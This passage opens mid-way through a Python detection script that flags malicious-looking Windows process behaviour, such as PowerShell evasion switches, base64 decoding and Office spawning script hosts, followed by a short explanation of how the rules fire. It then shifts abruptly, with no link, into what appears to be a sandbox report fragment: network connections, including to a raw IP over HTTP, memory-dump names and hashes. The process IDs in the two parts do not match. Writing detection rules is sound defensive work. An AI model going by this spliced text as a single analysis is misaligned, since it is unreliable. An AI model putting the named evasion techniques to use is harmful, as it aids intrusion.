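        if is_switch(tok, "executionpolicy", 2) and nxt in ("bypass", "unrestricted"):
            flags["bypass"] = True
        elif is_switch(tok, "windowstyle", 1) and nxt in ("hidden", "1"):  # 1 == ProcessWindowStyle.Hidden
            flags["hidden"] = True
        elif is_switch(tok, "noprofile", 3):
            flags["noprofile"] = True
    return flags


def case_mangled(image: str) -> bool:
    canon = CANONICAL.get(image.lower())
    return canon is not None and image != canon


def evaluate(events: list) -> list:
    """Run every rule over the tree and return sorted (rule, pid) pairs."""
    by_pid = {e.pid: e for e in events}
    hits = set()
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        body = e.cmdline.lower()
        if pname in OFFICE_APPS and name in SCRIPT_HOSTS:
            hits.add(("office_spawns_script_host", e.pid))
        if name == "powershell.exe":
            f = powershell_flags(e.cmdline)
            if f["bypass"] and (f["hidden"] or f["noprofile"]):
                hits.add(("powershell_evasion_switches", e.pid))
            if "frombase64string" in body:
                hits.add(("powershell_inline_b64_decode", e.pid))
            if "devicecredentialdeployment" in body:
                hits.add(("lolbin_console_hide", e.pid))
        if case_mangled(e.image):
            hits.add(("case_mangled_image_path", e.pid))
        if pname == "powershell.exe" and name in DOTNET_COMPILERS:
            hits.add(("powershell_spawns_compiler", e.pid))
        if name in ("wscript.exe", "cscript.exe", "mshta.exe") and "\\appdata\\" in body:
            hits.add(("script_host_from_appdata", e.pid))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:32} pid={pid}")
```

Because the relaunch pattern puts the child's switches into the parent's command line, the parent PowerShell (2208, 2448) fires the switch rule as well as the child; that is the intended behaviour for a hunting rule, since the text is literally present, but a rule that should fire once per launch would key on the resolved flags of the process's own first switch block instead. The case-mangling rule only works against a sensor that preserves the casing it saw; normalise-on-ingest pipelines lose that signal.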
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.32.7:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 88.221.135.113:80 | r10.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 7.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.204.146.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.135.221.88.in-addr.arpa | udp |
| US | 198.46.178.167:80 | 198.46.178.167 | tcp |
| US | 8.8.8.8:53 | 167.178.46.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
Files
memory/4808-2-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-1-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-3-0x00007FFE6210D000-0x00007FFE6210E000-memory.dmp
memory/4808-0-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-5-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-6-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-7-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4808-11-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-15-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-16-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-17-0x00007FFE1FA60000-0x00007FFE1FA70000-memory.dmp
memory/4808-14-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-18-0x00007FFE1FA60000-0x00007FFE1FA70000-memory.dmp
memory/4808-13-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-12-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-10-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-20-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-19-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-9-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-8-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-4-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp
memory/4192-40-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-43-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-44-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-45-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-46-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4808-48-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-52-0x00007FFE62070000-0x00007FFE62265000-memory.dmp
memory/4192-53-0x00007FF7A85C0000-0x00007FF7A85C8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 9056d632bc247d00191d7d1218f28c4a |
| SHA1 | 0e5e49802533f1c8c57194b29d6755258ba04fef |
| SHA256 | a66c800e76372ee169468a5794064a9249554ca721f5e88723f4444f003568fd |
| SHA512 | 42b0941b6d9574bd8fcf8a5ee8e6b97446d12bf41af22ac6cf6a65c6196383c5b2705eee13ec07b585cd96252d296fa2e7dcead54a6618458849b5278dd8c19f |